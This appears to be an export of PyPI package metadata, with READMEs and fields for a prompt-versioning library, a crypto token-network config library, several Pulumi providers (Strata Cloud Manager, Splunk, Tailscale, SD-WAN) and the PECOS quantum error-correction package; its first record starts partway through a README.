# 3. PromptVault compares and logs them
cmp = Compare(v1, v2)
cmp.log(r1, r2)
cmp.show()
```
Output:
```
────────────────────────────────────────────────────────────
PROMPTVAULT COMPARISON
────────────────────────────────────────────────────────────
Prompt A summarize (v1)
Prompt B summarize (v2)
────────────────────────────────────────────────────────────
── Response A ──
Here is a summary of the article...
── Response B ──
• Key point one
• Key point two
• Key point three
────────────────────────────────────────────────────────────
Metric Prompt A Prompt B
──────────────────────────── ──────────── ────────────
Word count 12 18
Char count 68 112
Latency (ms) 820.0 950.0
Tokens 45 62
────────────────────────────────────────────────────────────
```
---
## Core API
### `Prompt` — Define and version your prompts
```python
from promptvault import Prompt
# Create a prompt
p = Prompt(
name="classify",
template="Classify this text as positive or negative: {text}",
version="v1",
description="Sentiment classifier",
tags=["classify", "sentiment"],
)
# See required variables
p.variables() # ['text']
# Render it (just string formatting — no LLM call)
rendered = p.render(text="I love this product!")
# YOU call your LLM
response = your_llm(rendered)
# Log the response
p.log(
rendered_prompt=rendered,
response=response,
model="gpt-4o-mini", # optional
latency_ms=820, # optional
tokens=45, # optional
)
# View stats across all logged runs
p.stats()
# {
# 'run_count': 10,
# 'avg_latency_ms': 750.0,
# 'avg_tokens': 42.0,
# 'models_used': ['gpt-4o-mini'],
# ...
# }
# View raw run history
p.runs(last_n=10)
```
### Versioning
```python
# Create v2 — v1 is automatically preserved in history
v2 = p.update(
new_template="You are a sentiment expert. Classify as positive/negative/neutral: {text}"
)
# Auto-increments: v1 → v2. Or pass version="my-version"
# See all versions
p.history() # [{'version': 'v1', 'template': ..., ...}, {'version': 'v2', ...}]
```
### Save & Load YAML
```python
# Export to a human-readable file
p.save("prompts/classify.yaml")
# Load it back anywhere
p = Prompt.load("prompts/classify.yaml")
```
```yaml
# prompts/classify.yaml
name: classify
version: v1
description: Sentiment classifier
template: 'Classify this text as positive or negative: {text}'
tags:
- classify
- sentiment
```
---
### `Compare` — Side-by-side prompt comparison
```python
from promptvault import Compare
cmp = Compare(v1, v2)
# Log one comparison pair
cmp.log(
response_a=response_v1,
response_b=response_v2,
model="llama3", # optional
latency_ms_a=820, # optional
latency_ms_b=950, # optional
tokens_a=45, # optional
tokens_b=62, # optional
)
# Print side-by-side to terminal
cmp.show()
# Get structured diff dict
cmp.diff()
# {
# 'response_a': '...', 'response_b': '...',
# 'words_a': 12, 'words_b': 18,
# 'latency_ms_a': 820, 'latency_ms_b': 950,
# ...
# }
# Aggregate summary across multiple comparison runs
cmp.summary()
# {
# 'total_comparisons': 5,
# 'avg_words_a': 12.0, 'avg_words_b': 18.2,
# 'avg_latency_ms_a': 810.0, 'avg_latency_ms_b': 940.0,
# ...
# }
```
---
### `Registry` — Share prompts with your team
```python
from promptvault import Registry
reg = Registry("./shared_prompts") # any folder path
# Push prompts in
reg.push(v1)
reg.push(v2)
# Pull them out anywhere
p = reg.pull("classify") # latest version
p = reg.pull("classify", "v1") # specific version
reg.list() # ['classify', 'summarize', ...]
reg.versions("classify") # ['v1', 'v2']
reg.delete("classify", "v1")
```
---
## Works with Any LLM
Because PromptVault never makes LLM calls itself, it works with literally any model:
```python
# OpenAI
import openai
client = openai.OpenAI(api_key="...")
response = client.chat.completions.create(model="gpt-4o", messages=[{"role": "user", "content": rendered}])
p.log(rendered, response.choices[0].message.content, model="gpt-4o")
# Anthropic
import anthropic
client = anthropic.Anthropic(api_key="...")
response = client.messages.create(model="claude-haiku-4-5-20251001", max_tokens=1024, messages=[{"role": "user", "content": rendered}])
p.log(rendered, response.content[0].text, model="claude-haiku-4-5-20251001")
# Ollama (local, free, no key)
import requests
response = requests.post("http://localhost:11434/api/generate", json={"model": "llama3", "prompt": rendered, "stream": False})
p.log(rendered, response.json()["response"], model="llama3")
# Any other LLM, API, or local model
response = any_llm_you_want(rendered)
p.log(rendered, response)
```
---
## File Structure
```
your_project/
├── prompts/
│ └── classify.yaml ← exported prompt templates
├── .promptvault/
│ ├── history.json ← version history
│ └── runs.db ← run logs (SQLite)
└── main.py
```
Add `.promptvault/` to `.gitignore` to keep run logs local, or commit it to share analytics with your team.
---
## Run the Demo
```bash
git clone https://github.com/your-username/promptvault
cd promptvault
pip install pyyaml
python examples/demo.py
```
No API key needed — the demo uses simulated responses.
---
## Publish to PyPI
```bash
pip install build twine
python -m build
twine upload dist/*
```
See `PUBLISHING_GUIDE.md` for the full step-by-step.
---
## License
MIT © PromptVault Contributors
| text/markdown | null | Ankur Srivastav <ankursrivastava98@gmail.com> | null | null | MIT | llm, prompts, prompt-engineering, prompt-management, versioning, mlops, ai, comparison, testing | [
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
"Topic :: Software Development :: Libraries :: Python Modules",
"Topic :: Software Development :: Version Control"
] | [] | null | null | >=3.9 | [] | [] | [] | [
"pyyaml>=6.0",
"pytest>=7.0; extra == \"dev\"",
"pytest-cov>=4.0; extra == \"dev\"",
"black>=23.0; extra == \"dev\"",
"build; extra == \"dev\"",
"twine; extra == \"dev\""
] | [] | [] | [] | [] | twine/6.2.0 CPython/3.11.14 | 2026-02-20T06:49:01.662952 | llmpromptvault-0.1.0.tar.gz | 15,115 | 64/6e/a594e5d39173f407f475b36373002334be14dddbc4657a663984fbf15220/llmpromptvault-0.1.0.tar.gz | source | sdist | null | false | 6564b61e699edb9ca55fe93b044182e6 | 9bf6a4c4ab94a1229a02d845c78989466ca7c93497ecb7b1976dd6a2acc4e3a2 | 646ea594e5d39173f407f475b36373002334be14dddbc4657a663984fbf15220 | null | [
"LICENSE"
] | 254 |
2.4 | token-network | 0.1.1 | Validate input and return token network config (e.g. network.bitcoin, network.bsc.usdt) | # token-network
Python library that validates input and returns token network config. Resolve networks and tokens by name/symbol and get merged config (e.g. USDT on BSC with contract address and decimals).
## Install
```bash
pip install token-network
```
From source (development):
```bash
pip install -e .
```
## Quick start
```python
from token_network import network, get_network, get_token, get_token_network, TokenNetworkError
# Attribute access
network.bitcoin.config # Bitcoin network config
network.bsc.usdt # USDT on BSC (contract, decimal, etc.)
# By name/symbol
get_network("bitcoin") # Full network data
get_token("USDT") # Token info by symbol, slug, or name
get_token_network("USDT", "bsc") # Token-on-network config
```
---
## API reference
All identifiers (network name, token symbol/slug/name) are **case-insensitive**. Unknown network or token raises `TokenNetworkError`.
### Attribute access: `network`
Use `network.<network>` and optionally `network.<network>.<token>` for direct access.
| Usage | Returns |
|--------|--------|
| `network.bitcoin` | Network node (see below) |
| `network.bitcoin.config` | Network config dict |
| `network.bitcoin.tokens` | List of token bindings on this network |
| `network.bitcoin.to_dict()` | `{"config": {...}, "tokens": [...]}` |
| `network.bsc.usdt` | Token-on-network dict (network + token + contract_address, decimal, native) |
**Example**
```python
network.bitcoin.config
# {'network_type': 'UTXO', 'token_standard': 'BTC', 'base_token': 'BTC', 'base_token_decimal': 8, ...}
network.bsc.usdt
# {'network': {...}, 'token': {...}, 'contract_address': '0x55d398326f99059fF775485246999027B3197955', 'decimal': 18, 'native': False}
```
---
### `get_networks()`
Returns a sorted list of all network ids.
**Returns:** `list[str]` — e.g. `['bitcoin', 'bsc', 'dogecoin', 'ethereum', 'ripple', 'solana', 'tron']`
**Example**
```python
from token_network import get_networks
get_networks()
# ['bitcoin', 'bsc', 'dogecoin', 'ethereum', 'ripple', 'solana', 'tron']
```
Also available as `network.get_networks()`.
---
### `get_tokens()`
Returns a sorted list of all token symbols.
**Returns:** `list[str]` — e.g. `['AAVE', 'BNB', 'BTC', 'ETH', 'USDT', ...]`
**Example**
```python
from token_network import get_tokens
get_tokens()
# ['AAVE', 'BNB', 'BTC', 'DOGE', 'ETH', 'LINK', 'SHIB', 'SOL', 'TRX', 'UNI', 'USDC', 'USDT', 'XRP']
```
Also available as `network.get_tokens()`.
---
### `get_token(identifier)`
Get token object by **symbol**, **slug**, or **name** (case-insensitive).
**Parameters**
- `identifier` — Token symbol (e.g. `USDT`), slug (e.g. `usdt`), or name (e.g. `tether`).
**Returns:** `dict` — Token info: `slug`, `symbol`, `standard_symbol`, `name`, `precision`, `factor`.
**Raises:** `TokenNetworkError` if no token matches.
**Example**
```python
from token_network import get_token
get_token("USDT")
# {'slug': 'usdt', 'symbol': 'USDT', 'standard_symbol': 'USDT', 'name': 'tether', 'precision': 6, 'factor': '1e6'}
get_token("tether") # same
get_token("btc") # Bitcoin token info
```
Also available as `network.get_token(identifier)`.
---
### `get_network(identifier)`
Get network object by **network name/id** (case-insensitive).
**Parameters**
- `identifier` — Network name (e.g. `bitcoin`, `bsc`, `ethereum`).
**Returns:** `dict` with keys:
- `config` — Network config (network_type, token_standard, base_token, confirmation_number, etc.).
- `tokens` — List of token bindings on this network.
**Raises:** `TokenNetworkError` if network is unknown.
**Example**
```python
from token_network import get_network
get_network("bitcoin")
# {'config': {'network_type': 'UTXO', 'base_token': 'BTC', ...}, 'tokens': [...]}
get_network("BSC")
```
Also available as `network.get_network(identifier)`. Same shape as `network.bitcoin.to_dict()`.
---
### `get_token_network(token_identifier, network_identifier)`
Get token_network config for a **token** on a **network** (case-insensitive).
**Parameters**
- `token_identifier` — Token symbol, slug, or name (e.g. `USDT`, `usdt`, `tether`).
- `network_identifier` — Network name (e.g. `bsc`, `ethereum`).
**Returns:** `dict` with keys:
- `network` — Network config.
- `token` — Token info (slug, symbol, name, precision, factor).
- `contract_address` — Contract address or `None` for native.
- `decimal` / `decimals` — Decimals on this network.
- `native` / `type` — Whether it is the chain’s native asset.
**Raises:** `TokenNetworkError` if token or network is unknown, or if the token is not on that network.
**Example**
```python
from token_network import get_token_network
get_token_network("USDT", "bsc")
# {'network': {...}, 'token': {...}, 'contract_address': '0x55d398326f99059fF775485246999027B3197955', 'decimal': 18, 'native': False}
get_token_network("tether", "BSC") # same
get_token_network("ETH", "ethereum")
```
Same data as `network.bsc.usdt`. Also available as `network.get_token_network(token_identifier, network_identifier)`.
---
### `TokenNetworkError`
Exception raised when:
- A network name is unknown.
- A token (symbol/slug/name) is unknown.
- A token is requested on a network where it is not defined.
**Example**
```python
from token_network import get_network, get_token, get_token_network, TokenNetworkError
try:
get_network("unknown_chain")
except TokenNetworkError as e:
print(e) # Unknown network: 'unknown_chain'. Known networks: bitcoin, bsc, ...
try:
get_token("unknown_token")
except TokenNetworkError as e:
print(e) # Unknown token: 'unknown_token'. Known tokens: [...]
try:
get_token_network("SHIB", "bitcoin")
except TokenNetworkError as e:
print(e) # Token 'SHIB' is not on network 'bitcoin'. Available on this network: ['BTC']
```
---
## Data sources
Config is loaded from YAML in the package’s `data` directory:
| File | Content |
|------|--------|
| `networks.yaml` | Chain config (network_type, token_standard, base_token, confirmation_number, …) |
| `tokens.yaml` | Token definitions (symbol, slug, name, precision, factor) |
| `token_networks.yaml` | Token–network bindings (contract_address, decimal, native) |
To change data, edit the YAML files in `token_network/data/`.
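As an illustration, a token-on-network binding might look like this (the shape is inferred from the fields documented above, not the package's exact schema):

```yaml
# token_networks.yaml (illustrative shape)
- token: usdt
  network: bsc
  contract_address: "0x55d398326f99059fF775485246999027B3197955"
  decimal: 18
  native: false
```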
---
## Publishing to PyPI
To allow `pip install token-network` from PyPI:
1. Create an account on [pypi.org](https://pypi.org).
2. `pip install build twine`
3. `python -m build` then `twine upload dist/*`
For testing: `twine upload --repository testpypi dist/*`, then
`pip install --index-url https://test.pypi.org/simple/ token-network`.
---
## Development
```bash
pip install -e ".[dev]"
pytest
```
| text/markdown | null | null | null | null | MIT | blockchain, tokens, networks, crypto, config | [
"Development Status :: 3 - Alpha",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12"
] | [] | null | null | >=3.8 | [] | [] | [] | [
"PyYAML>=6.0",
"pytest>=7.0; extra == \"dev\""
] | [] | [] | [] | [] | twine/6.2.0 CPython/3.12.3 | 2026-02-20T06:48:42.266919 | token_network-0.1.1.tar.gz | 11,491 | 8f/ab/8bd4e3945aa2f1cc9f5c54ac8a3d66c10e2525ed1d1cfdc5bbc486a7e826/token_network-0.1.1.tar.gz | source | sdist | null | false | 4edc1d846bd4f618c2718c555a17b43a | a8f8a190c8ca4e4184e1d07a41baf7c6af77a9bfd03dc850c03c1eadb1b86ceb | 8fab8bd4e3945aa2f1cc9f5c54ac8a3d66c10e2525ed1d1cfdc5bbc486a7e826 | null | [] | 236 |
2.4 | pulumi-scm | 1.1.0a1771569449 | A Pulumi package for managing resources on Strata Cloud Manager. | # Strata Cloud Manager Resource Provider
A Pulumi package for managing resources on a [Strata Cloud Manager](https://www.pulumi.com/registry/packages/scm/) instance.
## Installing
This package is available for several languages/platforms:
### Node.js (JavaScript/TypeScript)
To use from JavaScript or TypeScript in Node.js, install using either `npm`:
```bash
npm install @pulumi/scm
```
or `yarn`:
```bash
yarn add @pulumi/scm
```
### Python
To use from Python, install using `pip`:
```bash
pip install pulumi_scm
```
### Go
To use from Go, use `go get` to grab the latest version of the library:
```bash
go get github.com/pulumi/pulumi-scm/sdk/go/...
```
### .NET
To use from .NET, install using `dotnet add package`:
```bash
dotnet add package Pulumi.Scm
```
## Reference
For detailed reference documentation, please visit [the Pulumi registry](https://www.pulumi.com/registry/packages/scm/api-docs/).
| text/markdown | null | null | null | null | Apache-2.0 | pulumi, scm, paloaltonetworks, category/network | [] | [] | null | null | >=3.9 | [] | [] | [] | [
"parver>=0.2.1",
"pulumi<4.0.0,>=3.165.0",
"semver>=2.8.1",
"typing-extensions<5,>=4.11; python_version < \"3.11\""
] | [] | [] | [] | [
"Homepage, https://pulumi.com",
"Repository, https://github.com/pulumi/pulumi-scm"
] | twine/6.2.0 CPython/3.11.8 | 2026-02-20T06:47:47.450559 | pulumi_scm-1.1.0a1771569449.tar.gz | 950,986 | cd/f3/fccf2b821b94a6ebf2f28c0f33d6926c8e3e351eba9e40d7e83d280f38db/pulumi_scm-1.1.0a1771569449.tar.gz | source | sdist | null | false | 6e2bac1b706724f78da7df1047d09324 | 5023eece42a1f2e46f47a42988d9ef8a693282713e0f9e8aab2d679281b01362 | cdf3fccf2b821b94a6ebf2f28c0f33d6926c8e3e351eba9e40d7e83d280f38db | null | [] | 213 |
2.4 | pulumi-splunk | 1.3.0a1771569595 | A Pulumi package for creating and managing splunk cloud resources. | [](https://github.com/pulumi/pulumi-splunk/actions)
[](https://slack.pulumi.com)
[](https://www.npmjs.com/package/@pulumi/splunk)
[](https://pypi.org/project/pulumi-splunk)
[](https://badge.fury.io/nu/pulumi.splunk)
[](https://pkg.go.dev/github.com/pulumi/pulumi-splunk/sdk/go)
[](https://github.com/pulumi/pulumi-splunk/blob/master/LICENSE)
# Splunk Resource Provider
The Splunk Resource Provider lets you manage Splunk resources.
## Installing
This package is available in many languages in the standard packaging formats.
### Node.js (JavaScript/TypeScript)
To use from JavaScript or TypeScript in Node.js, install using either `npm`:
$ npm install @pulumi/splunk
or `yarn`:
$ yarn add @pulumi/splunk
### Python
To use from Python, install using `pip`:
$ pip install pulumi_splunk
### Go
To use from Go, use `go get` to grab the latest version of the library
$ go get github.com/pulumi/pulumi-splunk/sdk
### .NET
To use from .NET, install using `dotnet add package`:
$ dotnet add package Pulumi.Splunk
## Configuration
The following configuration points are available:
- `splunk:url` - (Required) The URL for the Splunk instance to be configured. (The provider uses `https` as the default schema as prefix to the URL)
It can also be sourced from the `SPLUNK_URL` environment variable.
- `splunk:username` - (Optional) The username to access the Splunk instance to be configured. It can also be sourced
from the `SPLUNK_USERNAME` environment variable.
- `splunk:password` - (Optional) The password to access the Splunk instance to be configured. It can also be sourced
from the `SPLUNK_PASSWORD` environment variable.
- `splunk:authToken` - (Optional) Use auth token instead of username and password to configure Splunk instance. If specified, auth token takes priority over username/password.
It can also be sourced from the `SPLUNK_AUTH_TOKEN` environment variable.
- `splunk:insecureSkipVerify` - (Optional) Skip TLS certificate verification (defaults to `true`)
It can also be sourced from the `SPLUNK_INSECURE_SKIP_VERIFY` environment variable.
- `splunk:timeout` - (Optional) Timeout when making calls to Splunk server. (Defaults to `60 seconds`)
It can also be sourced from the `SPLUNK_TIMEOUT` environment variable.
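As an illustration, these settings can be supplied through the Pulumi stack configuration using `pulumi config set` (all values below are placeholders):

```bash
# Required: the Splunk instance URL
pulumi config set splunk:url https://localhost:8089

# Either username/password...
pulumi config set splunk:username admin
pulumi config set splunk:password --secret examplePassword

# ...or an auth token (takes priority if both are set)
pulumi config set splunk:authToken --secret exampleToken
```

Alternatively, export the corresponding `SPLUNK_*` environment variables before running `pulumi up`.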
## Reference
For further information, please visit [the Splunk provider docs](https://www.pulumi.com/docs/intro/cloud-providers/splunk)
or for detailed reference documentation, please visit [the API docs](https://www.pulumi.com/docs/reference/pkg/splunk).
| text/markdown | null | null | null | null | Apache-2.0 | pulumi, splunk | [] | [] | null | null | >=3.9 | [] | [] | [] | [
"parver>=0.2.1",
"pulumi<4.0.0,>=3.0.0a1",
"semver>=2.8.1",
"typing-extensions<5,>=4.11; python_version < \"3.11\""
] | [] | [] | [] | [
"Homepage, https://pulumi.io",
"Repository, https://github.com/pulumi/pulumi-splunk"
] | twine/6.2.0 CPython/3.11.8 | 2026-02-20T06:47:44.424997 | pulumi_splunk-1.3.0a1771569595.tar.gz | 158,683 | 32/10/ca2752addb18e9d24a5bf8b1edff6f7ae32aec4c84d494dd0d894815cccc/pulumi_splunk-1.3.0a1771569595.tar.gz | source | sdist | null | false | 7214a6b8c590288eddc4b7d9f9233911 | 3cf815f872cab5af350047e7386177778efc7f662bab196d5f392c8a25383a67 | 3210ca2752addb18e9d24a5bf8b1edff6f7ae32aec4c84d494dd0d894815cccc | null | [] | 209 |
2.4 | pulumi-tailscale | 1.0.0a1771569675 | A Pulumi package for creating and managing Tailscale cloud resources. | [](https://github.com/pulumi/pulumi-tailscale/actions)
[](https://slack.pulumi.com)
[](https://www.npmjs.com/package/@pulumi/tailscale)
[](https://pypi.org/project/pulumi-tailscale)
[](https://badge.fury.io/nu/pulumi.tailscale)
[](https://pkg.go.dev/github.com/pulumi/pulumi-tailscale/sdk)
[](https://github.com/pulumi/pulumi-tailscale/blob/master/LICENSE)
# Tailscale Resource Provider
The Tailscale Resource Provider lets you manage [Tailscale](https://tailscale.com/) resources.
## Installing
This package is available in many languages in the standard packaging formats.
### Node.js (JavaScript/TypeScript)
To use from JavaScript or TypeScript in Node.js, install using either `npm`:
```bash
npm install @pulumi/tailscale
```
or `yarn`:
```bash
yarn add @pulumi/tailscale
```
### Python
To use from Python, install using `pip`:
```bash
pip install pulumi_tailscale
```
### Go
To use from Go, use `go get` to grab the latest version of the library:
```bash
go get github.com/pulumi/pulumi-tailscale/sdk
```
### .NET
To use from .NET, install using `dotnet add package`:
```bash
dotnet add package Pulumi.Tailscale
```
## Configuration
The following configuration points are available:
- `tailscale:apiKey` - (Required) API key to authenticate with the Tailscale API. It must be provided, but it can also be sourced
from the `TAILSCALE_API_KEY` environment variable.
- `tailscale:tailnet` - (Required) Tailscale tailnet to manage resources for. It must be provided, but it can also be
sourced from the `TAILSCALE_TAILNET` variable. A tailnet is the name of your Tailscale network. You can find it in
the top left corner of the Admin Panel beside the Tailscale logo.
- `tailscale:oauthClientId` - (Optional) The OAuth application's ID when using OAuth client credentials. It can also be sourced from the `OAUTH_CLIENT_ID` environment variable. Both `oauthClientId` and `oauthClientSecret` must be set. Conflicts with `apiKey`.
- `tailscale:oauthClientSecret` - (Optional) The OAuth application's secret when using OAuth client credentials. It can also be sourced from the `OAUTH_CLIENT_SECRET` environment variable. Both `oauthClientId` and `oauthClientSecret` must be set. Conflicts with `apiKey`.
- `tailscale:scopes` - (Optional) The OAuth 2.0 scopes to request for the access token generated from the supplied OAuth client credentials. See https://tailscale.com/kb/1215/oauth-clients/#scopes for available scopes. Only valid when both `oauthClientId` and `oauthClientSecret` are set.
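As an illustration, the two authentication styles can be set on a Pulumi stack like this (all values are placeholders):

```bash
# API-key authentication
pulumi config set tailscale:tailnet example.com
pulumi config set tailscale:apiKey --secret tskey-api-example

# Or OAuth client credentials (conflicts with apiKey)
pulumi config set tailscale:oauthClientId exampleClientId
pulumi config set tailscale:oauthClientSecret --secret exampleClientSecret
```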
## Reference
For further information, please visit [the Tailscale provider docs](https://www.pulumi.com/registry/packages/tailscale)
or for detailed reference documentation, please visit [the API docs](https://www.pulumi.com/registry/packages/tailscale/api-docs/).
| text/markdown | null | null | null | null | Apache-2.0 | pulumi, tailscale | [] | [] | null | null | >=3.9 | [] | [] | [] | [
"parver>=0.2.1",
"pulumi<4.0.0,>=3.165.0",
"semver>=2.8.1",
"typing-extensions<5,>=4.11; python_version < \"3.11\""
] | [] | [] | [] | [
"Homepage, https://pulumi.io",
"Repository, https://github.com/pulumi/pulumi-tailscale"
] | twine/6.2.0 CPython/3.11.8 | 2026-02-20T06:47:40.009361 | pulumi_tailscale-1.0.0a1771569675.tar.gz | 48,008 | 26/40/d61410e50ea85987ad7862ba8d500a0750c51060eecb6f73b2330f9fe0a8/pulumi_tailscale-1.0.0a1771569675.tar.gz | source | sdist | null | false | 8dc5228f7d78f01da23f7bb196b241fe | f2ea3b920a71db93202eccda6e3e7fe655e497cdf0e1b6364937c04a1662d497 | 2640d61410e50ea85987ad7862ba8d500a0750c51060eecb6f73b2330f9fe0a8 | null | [] | 212 |
2.4 | pulumi-sdwan | 0.7.0a1771569482 | A Pulumi package for managing resources on Cisco Catalyst SD-WAN. | # SDWAN Resource Provider
A Pulumi package for resources to interact with a Cisco Catalyst SD-WAN environment. It communicates with the SD-WAN Manager via the REST API.
## Installing
This package is available for several languages/platforms:
### Node.js (JavaScript/TypeScript)
To use from JavaScript or TypeScript in Node.js, install using either `npm`:
```bash
npm install @pulumi/sdwan
```
or `yarn`:
```bash
yarn add @pulumi/sdwan
```
### Python
To use from Python, install using `pip`:
```bash
pip install pulumi_sdwan
```
### Go
To use from Go, use `go get` to grab the latest version of the library:
```bash
go get github.com/pulumi/pulumi-sdwan/sdk/go/...
```
### .NET
To use from .NET, install using `dotnet add package`:
```bash
dotnet add package Pulumi.Sdwan
```
## Reference
For detailed reference documentation, please visit [the Pulumi registry](https://www.pulumi.com/registry/packages/sdwan/api-docs/).
| text/markdown | null | null | null | null | Apache-2.0 | pulumi, sdwan, category/network | [] | [] | null | null | >=3.9 | [] | [] | [] | [
"parver>=0.2.1",
"pulumi<4.0.0,>=3.165.0",
"semver>=2.8.1",
"typing-extensions<5,>=4.11; python_version < \"3.11\""
] | [] | [] | [] | [
"Homepage, https://pulumi.com",
"Repository, https://github.com/pulumi/pulumi-sdwan"
] | twine/6.2.0 CPython/3.11.8 | 2026-02-20T06:47:27.409878 | pulumi_sdwan-0.7.0a1771569482.tar.gz | 2,004,248 | c8/6e/fc420242874a9e7cd3d137d86e76e62ec4b4b039c65905485ba083fc6805/pulumi_sdwan-0.7.0a1771569482.tar.gz | source | sdist | null | false | 9d629148a5172dec3dc5857fb0a0356c | b82f829a17c85e2e5f09213c0d85ea5f46185bbd7f8d135a1949cd0887a13154 | c86efc420242874a9e7cd3d137d86e76e62ec4b4b039c65905485ba083fc6805 | null | [] | 202 |
2.4 | quantum-pecos | 0.8.0.dev3 | PECOS is a library for the evaluation, study, and design of quantum error correction protocols. | # 
[](https://badge.fury.io/py/quantum-pecos)
[](https://quantum-pecos.readthedocs.io/en/latest/?badge=latest)
[](https://img.shields.io/badge/python-3.9%2C%203.10%2C%203.11-blue.svg)
[](https://www.quantinuum.com/)
**Performance Estimator of Codes On Surfaces (PECOS)** is a library/framework dedicated to the study, development, and
evaluation of quantum error-correction protocols. It also offers tools for the study and evaluation of hybrid
quantum/classical compute execution models.
Initially conceived and developed in 2014 to verify lattice-surgery procedures presented in
[arXiv:1407.5103](https://arxiv.org/abs/1407.5103) and released publicly in 2018, PECOS filled the gap in
the QEC/QC tools available at that time. Over the years, it has grown into a framework for studying general QECCs and
hybrid computation.
## Features
- Quantum Error-Correction Tools: Advanced tools for studying quantum error-correction protocols and error models.
- Hybrid Quantum/Classical Execution: Evaluate advanced hybrid compute models, including support for classical compute,
calls to Wasm VMs, conditional branching, and more.
- Fast Simulation: Leverages a fast stabilizer simulation algorithm.
- Multi-language extensions: Core functionalities implemented via Rust for performance and safety. Additional add-ons
and extension support in C/C++ via Cython.
- LLVM IR Support: Execute LLVM Intermediate Representation programs for hybrid quantum/classical computing. LLVM support is enabled by default and requires LLVM version 14; PECOS can also be built without it by passing `--no-default-features` when building the Rust crates.
## Getting Started
Explore the capabilities of PECOS by delving into the [documentation](https://quantum-pecos.readthedocs.io).
## Repository Structure
PECOS now consists of multiple interconnected components:
- `/python/`: Contains Python packages
- `/python/quantum-pecos/`: Main Python package (imports as `pecos`)
- `/python/pecos-rslib/`: Python package with Rust extensions that utilize the `pecos` crate
- `/crates/`: Contains Rust crates
- `/crates/pecos/`: Main Rust crate that collects the functionality of the other crates into one library
- `/crates/pecos-core/`: Core Rust functionalities
- `/crates/pecos-qsims/`: A collection of quantum simulators
- `/crates/pecos-qec/`: Rust code for analyzing and exploring quantum error correction (QEC)
- `/crates/pecos-qasm/`: Implementation of QASM parsing and execution
- `/crates/pecos-llvm-runtime/`: Implementation of LLVM IR execution for hybrid quantum-classical programs
- `/crates/pecos-engines/`: Quantum and classical engines for simulations
- `/crates/pecos/`: Main PECOS library (includes CLI with `cli` feature)
- `/crates/pecos-build/`: Developer tools CLI (LLVM setup, dependency management)
- `/crates/pecos-python/`: Rust code for Python extensions
- `/crates/benchmarks/`: A collection of benchmarks to test the performance of the crates
- `/julia/`: Contains Julia packages (experimental)
- `/julia/PECOS.jl/`: Main Julia package
- `/julia/pecos-julia-ffi/`: Rust FFI library for Julia bindings
### Quantum Error Correction Decoders
PECOS includes LDPC (Low-Density Parity-Check) quantum error correction decoders as optional components. See [DECODERS.md](DECODERS.md) for detailed information about:
- LDPC decoder algorithms and variants
- How to build and use decoders
- Performance considerations
- Architecture and development guide
You may find most of these crates on crates.io if you wish to utilize only a part of PECOS, e.g., the simulators.
## Versioning
We follow semantic versioning principles. However, before version 1.0.0, the roles of MAJOR and MINOR in the
MAJOR.MINOR.PATCH format are shifted down a step. This means potential breaking changes might occur between MINOR
increments, such as moving from version 0.1.0 to 0.2.0.
All Python packages and all Rust crates will have the same version amongst their
respective languages; however, Python and Rust versioning will differ.
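As a rough illustration of the pre-1.0 rule above, the following (hypothetical, not part of PECOS) helper decides whether two version strings may be incompatible under that policy:

```python
def may_break(old: str, new: str) -> bool:
    """Illustrative check of a pre-1.0 versioning rule:
    before 1.0.0, a MINOR bump (e.g. 0.1.0 -> 0.2.0) may contain
    breaking changes; from 1.0.0 on, only a MAJOR bump may."""
    # Take the first three numeric components; ignore suffixes like ".dev3".
    o = tuple(int(p) for p in old.split(".")[:3])
    n = tuple(int(p) for p in new.split(".")[:3])
    if o[0] == 0 and n[0] == 0:
        return o[1] != n[1]   # pre-1.0: MINOR acts like MAJOR
    return o[0] != n[0]       # post-1.0: usual semver rule

print(may_break("0.1.0", "0.2.0"))  # True
print(may_break("1.2.0", "1.3.0"))  # False
```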
## Latest Development
Stay updated with the latest developments on the
[PECOS Development branch](https://quantum-pecos.readthedocs.io/en/development/).
## Installation
### Python Package
To install the main Python package for general usage:
```sh
pip install quantum-pecos
```
This will install both `quantum-pecos` and its dependency `pecos-rslib`.
For optional dependencies:
```sh
pip install quantum-pecos[all]
```
**NOTE:** The `quantum-pecos` package is imported as `import pecos`, not `import quantum_pecos`.
**NOTE:** To install pre-releases (the latest development code) from PyPI, you may have to specify the version you are
interested in, like so (e.g., for version `0.6.0.dev5`):
```sh
pip install quantum-pecos==0.6.0.dev5
```
**NOTE:** Certain simulators have special requirements and are not installed by the command above. Installation instructions for
these are provided [here](#simulators-with-special-requirements).
### Rust Crates
To use PECOS in your Rust project, add the following to your `Cargo.toml`:
```toml
[dependencies]
pecos = "0.x.x" # Replace with the latest version
```
#### Optional Dependencies
- **LLVM version 14**: Required for LLVM IR execution support (optional)
PECOS provides an automated installer or you can install manually:
```sh
# Quick setup with automated installer (recommended):
cargo run -p pecos --features cli -- llvm install
cargo build
```
The installer automatically configures PECOS after installation.
For detailed LLVM installation instructions for all platforms (macOS, Linux, Windows), see the [**Getting Started Guide**](docs/user-guide/getting-started.md#llvm-for-qis-support).
For full development environment setup, see the [**Development Setup Guide**](docs/development/DEVELOPMENT.md).
**Building without LLVM:** If you don't need LLVM IR support:
```sh
cargo build --no-default-features
```
### Julia Package (Experimental)
PECOS also provides experimental Julia bindings. To use the Julia package from the development branch:
```julia
using Pkg
Pkg.add(url="https://github.com/PECOS-packages/PECOS#dev", subdir="julia/PECOS.jl")
```
Then you can use it:
```julia
using PECOS
println(pecos_version()) # Prints PECOS version
```
**Note**: The Julia package requires the Rust FFI library to be built. Currently, you need to build it locally:
1. Clone the repository
2. Build the FFI library: `cd julia/pecos-julia-ffi && cargo build --release`
3. Add the package locally: `Pkg.develop(path="julia/PECOS.jl")`
## Development Setup
If you are interested in editing or developing the code in this project, see this
[development documentation](docs/development/DEVELOPMENT.md) to get started.
## Simulators with special requirements
Certain simulators from `pecos.simulators` require external packages that are not installed by `pip install .[all]`.
### GPU-Accelerated Simulators (CuStateVec and MPS)
- **`CuStateVec`** and **`MPS`** require:
- Linux machine with NVIDIA GPU (Compute Capability 7.0+)
- CUDA Toolkit 13 or 12 (system-level installation)
